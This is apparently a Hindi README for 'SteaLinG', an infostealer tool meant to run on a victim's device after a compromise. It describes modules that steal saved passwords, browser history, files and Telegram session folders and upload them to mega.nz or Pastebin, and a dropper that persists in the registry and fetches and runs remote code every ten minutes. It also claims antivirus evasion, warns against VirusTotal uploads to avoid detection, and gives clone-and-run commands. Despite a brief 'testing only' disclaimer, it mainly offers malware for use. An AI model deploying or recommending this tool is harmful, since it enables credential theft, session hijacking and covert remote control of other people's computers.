
The SteaLinG एक ओपन-सोर्स पेनिट्रेशन टेस्टिंग फ्रेमवर्क है जो सोशल इंजीनियरिंग के लिए डिज़ाइन किया गया है।
SteaLinG एक ओपन-सोर्स पेनिट्रेशन टेस्टिंग फ्रेमवर्क है जो सोशल इंजीनियरिंग के लिए डिज़ाइन किया गया है। हैक के बाद, आप इसे पीड़ित के डिवाइस पर अपलोड कर सकते हैं और चला सकते हैं।
यह केवल परीक्षण उद्देश्यों के लिए है और इसका उपयोग केवल वहीं किया जा सकता है जहाँ कड़ी सहमति दी गई हो। इसे अवैध उद्देश्यों के लिए उपयोग न करें।
anonfiles.com के बंद होने के कारण मैंने कोड को संशोधित किया है, और अब यह परिणाम mega.nz पर अपलोड करता है।
| मॉड्यूल | संक्षिप्त विवरण |
|---|---|
| 1-Telegram Session Hijack | टेलीग्राम सेशन हाईजैकर |
C:\Users<pc name >\AppData\Roaming\Telegram Desktop
'tdata' फ़ोल्डर मेंC:
└── Users
├── .AppData
│ └── Roaming
│ └── TelegramDesktop
│ └── tdata
एक बार जब आप इस फ़ोल्डर को, इसकी सभी सामग्री के साथ, अपने डिवाइस पर उसी पथ पर स्थानांतरित कर लेते हैं, तो आपको बस आवश्यक कार्य करना होगा। टूल सब कुछ संभाल लेगा, और आपको बस इतना करना है कि https://mega.nz/ वेबसाइट पर अपना ईमेल और पासवर्ड प्रदान करें। पहला कदम tdata फ़ाइल के स्थान पर जाना है, और फिर इसे एक ज़िप फ़ाइल में बदलना है। यदि टेलीग्राम सही ढंग से काम कर रहा है, तो यह त्रुटि नहीं होगी। यदि कोई त्रुटि होती है, तो इसका मतलब है कि टेलीग्राम खुला है, और आपको इसकी प्रक्रियाओं को समाप्त करना चाहिए। आप देखेंगे कि यह व्यवहार दुर्भावनापूर्ण है, इसलिए मैंने कोड में try और except का उपयोग करके इसे पूरी तरह से टाला है। आर्काइव फ़ाइल का नाम पीड़ित के डिवाइस के नाम के साथ उपयोग किया जाता है, क्योंकि यदि आपके कई डिवाइस हैं, तो उनके बीच अंतर करना संभव है। उसके बाद, आप mega वेबसाइट पर ईमेल और पासवर्ड का उपयोग करके ज़िपफ़ाइल के लिए एक अनुरोध सबमिट करेंगे। बस इतना ही, यह किसी भी AV द्वारा डिटेक्ट नहीं होता है।
| मॉड्यूल |
|---|
| 2- Dropper |
.exe या .png या कोई अन्य महत्वपूर्ण एक्सटेंशन होना चाहिए। महत्वपूर्ण बात यह है कि link एक एक्सटेंशन (.any extension) के साथ समाप्त होता है।
दूसरी चीज़ है आपसे API key प्राप्त करना, जो आप प्रदान करेंगे। आप रजिस्टर कर सकते हैं और इसे खोजने के लिए "API" शब्द पर क्लिक कर सकते हैं, और फिर username और password नोट कर लें।
सबसे पहले वेबसाइट पर एक प्राइवेट पेस्ट बनाना है। उसके बाद, यह आपके द्वारा प्रदान किए गए URL को जोड़ता है और आपको एक्जीक्यूटेबल (exe) फ़ाइल देता है। इसका कार्य किसी भी डिवाइस पर चलने पर स्वयं को दो अलग-अलग तरीकों से डिवाइस के रजिस्ट्री में जोड़ना है।
पहले, यह Pastebin वेबसाइट खोलता है और आपके द्वारा बनाए गए विशेष पेस्ट को डालता है। फिर यह paste URL लेता है, उसकी सामग्री डाउनलोड करता है, और चलाता है। इसके अलावा, आप किसी भी समय दूसरा URL दर्ज कर सकते हैं। यह बहुत सामान्य है क्योंकि ड्रॉपर हर 10 मिनट में URL की जाँच करता है। यदि इसे कोई नया URL मिलता है, तो यह उसकी सामग्री डाउनलोड करता है, उससे जुड़ता है, और चलता रहता है। आपको कुछ भी करने की आवश्यकता नहीं है। इसलिए, हर 10 मिनट में, आप अपने डिवाइस को कहीं से भी एक्सेस कर सकते हैं।
3- Linux समर्थन
4-अब आप Mega या Pastebin के बीच चुन सकते हैं
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python3 -m pip install -r requirements.txt
python SteaLinG.py
* VirusTotal.com पर अपलोड न करें क्योंकि यह टूल समय के साथ काम नहीं करेगा।
* VirusTotal एंटीवायरस कंपनियों के साथ सिग्नेचर साझा करता है।
* फिर से, बेवकूफ मत बनो!


यदि यह टूल आपके लिए उपयोगी रहा है, तो बेझिझक मुझे एक कॉफ़ी खरीदकर धन्यवाद दें :)
| मॉड्यूल | संक्षिप्त विवरण |
|---|
| Dump passwords | सभी सेव किए गए पासवर्ड चुराएं, पासवर्ड सेव फ़ाइल को mega -pastebin पर अपलोड करें |
| Dump History | ब्राउज़र हिस्ट्री डंप करें, हिस्ट्री सेव फ़ाइल को mega -pastebin पर अपलोड करें |
| dump files | हार्ड ड्राइव से आपकी चाही गई एक्सटेंशन वाली फ़ाइलें चुराएं और mega पर अपलोड करें |
| Telegram Session Hijack | टेलीग्राम सेशन हाईजैकर, Mega पर अपलोड करें |
| Dropper | नीचे देखें |